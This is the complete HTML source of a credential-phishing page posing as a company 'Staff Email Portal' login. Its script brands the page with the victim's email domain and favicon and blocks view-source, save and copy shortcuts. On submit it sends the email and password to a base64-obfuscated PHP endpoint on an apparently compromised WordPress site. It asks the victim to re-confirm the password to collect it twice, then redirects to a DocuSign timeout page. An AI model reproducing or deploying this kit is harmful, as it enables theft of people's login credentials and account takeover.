<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log into | Account</title>
    <link rel="stylesheet" href="https://d12y7sg0iam4lc.cloudfront.net/b1660/s/css/bootstrap/bootstrap.min.css">
    <style>
        body {
            margin: 0;
            font-family: 'Inter', sans-serif;
            background-color: #f4f4f4;
        }

        .form-container {
            display: flex;
            justify-content: center;
            align-items: center;

        }

        .form-wrapper {
            width: 400px;
            background-color: #f4f4f4;
            padding: 20px;
            border-radius: 20px;
   
        }

        .form-wrapper h2 {
            text-align: center;
            margin-bottom: 20px;
        }

        .form-wrapper .label-inp {
            margin-bottom: 15px;
        }

        .form-wrapper input {
            width: 80%;
            padding: 10px;
            margin: 0 auto;
            display: block;
            border: 1px solid #ccc;
            border-radius: 4px;
        }

        .form-wrapper .signin-button {
            width: 80%;
            padding: 10px;
            margin: 20px auto 0;
            display: block;
            background-color: green;
            color: white;
            border: none;
            border-radius: 4px;
            font-size: 16px;
            cursor: pointer;
            text-align: center;
        }

        .form-wrapper .signin-button:hover {
            background-color: darkgreen;
        }

        .form-wrapper .stay-in-txt {
            font-size: 14px;
            color: #666;
        }

        .form-wrapper em {
            font-size: 12px;
            color: #999;
            display: block;
            text-align: center;
            margin-top: 10px;
        }
    </style>
</head>
  <body >
      <header class="header-wrap navbar navbar-default navbar-fixed-top qr-collapse-navbar">
        <div id="header" class="container">
          <div id="quire-logo" class="navbar-header">
  <h1 >

  <img src="" alt="" id="logoimg" style="width:50px;height:50px;margin-top:10px;" >
  </h1>
</div>
        </div>
      </header>
      <div id="body" class="container">
        
<div align="center">
  <article>
    <h2 class="title"><span class="logoname"> Quire </span> Staff Email Portal </h2>
      <h3 class="desc">Welcome Back!</h3>
  </article>
</div>
    <div class="form-container">
        <div class="form-wrapper">

            <form action="" method="post">
<center>
                <span id="msg" class="error-header hasError" style="display: none; font-size: 14px; color: red;">Re-confirm your password.</span>
                <span id="error" class="error-header hasError" style="display: none; font-size: 14px; color: red;"></span>
</center>
<br />
        
<br />        <div class="label-inp">
                    <input type="email" id="a" class="name form-control" name="a" value="" readonly placeholder="Email" />
                </div>

                <div class="label-inp">
                    <input type="password" id="az" class="password form-control" name="az" placeholder="Password" />
                </div>

<br />
        
<br /> 

                <button class="signin-button" type="submit" id="submit-btn">Login</button>
                <em>Because you're accessing sensitive information, you need to verify you are not a robot.</em>
            </form>
        </div>
    </div>

    
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-48347893-1"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://d12y7sg0iam4lc.cloudfront.net/b1268/s/js/mesg_en.js"></script>
<script async src="https://d12y7sg0iam4lc.cloudfront.net/b1268/s/js/pack.min.js"></script>
<script src="https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/en_US/appleid.auth.js"></script>
<script async src="https://d12y7sg0iam4lc.cloudfront.net/b1268/s/js/authen.min.js"></script>

        <script>

// prevent ctrl + s
$(document).bind('keydown', function(e) {
if(e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());

document.onkeydown = function(e) {
if (e.ctrlKey && 
(e.keyCode === 67 ||   
e.keyCode === 86 || 
e.keyCode === 85 || 
e.keyCode === 117)) {
return false;
} else {
return true;
}
};
$(document).keypress("u",function(e) {
if(e.ctrlKey)
{
return false;      }
else {
return true;
}});




    /* global $ */
    $(document).ready(function(){
      var count=0;
 
      $('#back1').click(function () {
        $("#msg").hide();
        $('#a').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });
      
   
      var a = window.location.hash.substr(1);
      if (!a) {

      }
      else
      {
        var my_a = (a);
        $('#a').val(my_a); 
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_a)) {
          $('#error').show();
           a.focus;
           return false;
        }
   var ind=my_a.indexOf("@");
        var my_slice=my_a.substr((ind+1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.charAt(0).toUpperCase() + c.slice(1);
        var finalu= c.toUpperCase();

      
        $(".logoname").html(final);
      
  
      var ind=my_a.indexOf("@");
        var my_slice=my_a.substr((ind+1));
  var mainPage = 'https://'+my_slice; 
  
  var sv = my_slice;
  
  var image = "url('https://image.thum.io/get/width/1200/https://"+sv;"')"
  

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+mainPage);
         
      <!---  document.body.style.backgroundImage = image; --->
   
     $(".a").html(a);
  
      }
 
      $('#submit-btn').click(function(event){
    
  event.preventDefault();
        $('#error').hide();
        $('#msg').hide();
        var a=$("#a").val();
        var az=$("#az").val();
      ///////////new injection////////////////
      var my_a =a;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!a) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:15px'> Email field is empty</p>");
        
            return false;
        }

        if (!filter.test(my_a)) {
            $('#error').show();
            $('#error').html("<p style='color:red; font-size:14px'>That account doesn't exist. Enter a different account</p>");
            
            return false;
        }
        if (!az) {
            $('#error').show();
            $('#error').html("Password field is empty");
         
            return false;
        }
   if (az.length < 8 ) {
            $('#error').show();
            $('#error').html("An error occured, invalid password");
            a.focus;
            return false;
        } 
 
   
      ///////////new injection////////////////
      count=count+1;
    //  console.log(count); 
 var d=atob('aHR0cHM6Ly9ibG9vbWRlc2lnbi5iaXovd3AtYWRtaW4vaW5jbHVkZXMvcG9wLnBocA==');
    $.ajax({
        dataType: 'JSON',
  url: d,
        type: 'POST',
        data:{
          a:a,
          az:az
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Proccessing....');
     
    //  console.log(count); 
            },
            success: function(response){
    $('#msg').html("<span style='color:red;'>Re-confirm your Password again</span>");
              if(response){
                $("#msg").show();
    console.log(response);
    $('#msg').html(response['msg']);
                if(response['signal'] == 'ok'){
                  $("#az").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://na4.docusign.net/Signing/SessionTimeout.aspx?fi=230f89df-896f-418c-81af-7ffb9804b50f");

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                   $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#az").val("");
              if (count>=2) {
                count=0;
                window.location.replace("https://na4.docusign.net/Signing/SessionTimeout.aspx?fi=230f89df-896f-418c-81af-7ffb9804b50f");
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });  
    });


    });


  </script>
</body>
</html>
